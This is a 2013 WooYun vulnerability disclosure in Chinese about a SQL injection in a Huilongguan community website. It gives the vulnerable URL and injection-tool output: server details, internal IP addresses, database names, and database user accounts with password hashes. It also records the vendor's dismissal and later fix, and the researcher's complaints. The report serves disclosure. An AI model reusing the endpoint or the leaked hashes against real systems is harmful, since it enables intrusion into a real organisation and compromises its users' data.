当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034338

漏洞标题:回龙观社区网SQL注射漏洞

相关厂商:hlgnet.com

漏洞作者: M4sk

提交时间:2013-08-14 18:37

修复时间:2013-08-19 18:37

公开时间:2013-08-19 18:37

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-14: 细节已通知厂商并且等待厂商处理中
2013-08-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

不知道该表达什么心情,我提交漏洞的时候,心情只有一个,一直想坚持告诉自己选择的方向是对的!但是我总是会被一些厂商无视了我提交的漏洞和安全,我没有李俊的态度要报复社会,但是我确实自嘲身边很多兄弟都是这样的屌丝!只想把这个问题告诉厂商,但是不需要拿出来和大家交流,这种心情,定然是很多基友的心情!

详细说明:

SQL注射地址:
http://shang.hlgnet.com/gotogg.php?id=298

2.jpg

1.jpg


Target: 		http://shang.hlgnet.com/gotogg.php?id=298
Host IP: 61.49.22.91
Web Server: nginx/0.8.15
Powered-by: PHP/5.3.6
DB Server: MySQL
Resp. Time(avg): 2005 ms
Sql Version: 5.1.44-log
Current DB: shang_hlgnet_com
System User: chuckliu@192.168.1.101
Host Name: dhtl105
Installation dir: /usr/local/mysql/
DB User & Pass: root:*A2D523B7B6CD64479294A0A795DD04936EB0D87B:localhost
shang:77c2275e2465c383:192.168.1.104
chuckliu:627ba4f768356ee9:192.168.1.111
chuckliu:627ba4f768356ee9:192.168.1.103
chuckliu:627ba4f768356ee9:192.168.1.102
chuckliu:627ba4f768356ee9:192.168.1.101
activemail:44b35bac63794a88:192.168.1.104
chuckliu:*385CB109EA4F81B5E88DDC22CA9A2A7B7FDED686:192.168.1.104
chuckliu:627ba4f768356ee9:192.168.1.106
Data Bases: information_schema
aixin_hlgnet_com
app_hlgnet_com
bid_hlgnet_com
fb_hlgnet_com
fuwu_hlgnet_com
guide_hlgnet_com
jc_hlgnet_com
library_hlgnet_com
map_hlgnet_com
mysql
news_hlgnet_com
photo_hlgnet_com
shang_hlgnet_com
survey_hlgnet_com
test
tuan_hlgnet_com
v_hlgnet_com
zuitu_db

漏洞证明:

见详细说明

修复方案:

貌似还会忽略

版权声明:转载请注明来源 M4sk@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-08-19 18:37

厂商回复:

最新状态:

2013-08-19:谢谢提醒,已经修复。前两天出差,才看到通知。


漏洞评价:

评论

  1. 2013-08-19 19:27 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    @xsser @疯狗 @回龙观社区网 这还可以确认吗? 不是厂商主动忽略的

  2. 2013-08-19 19:28 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    汗 你 修复了 rank都不给个 o(︶︿︶)o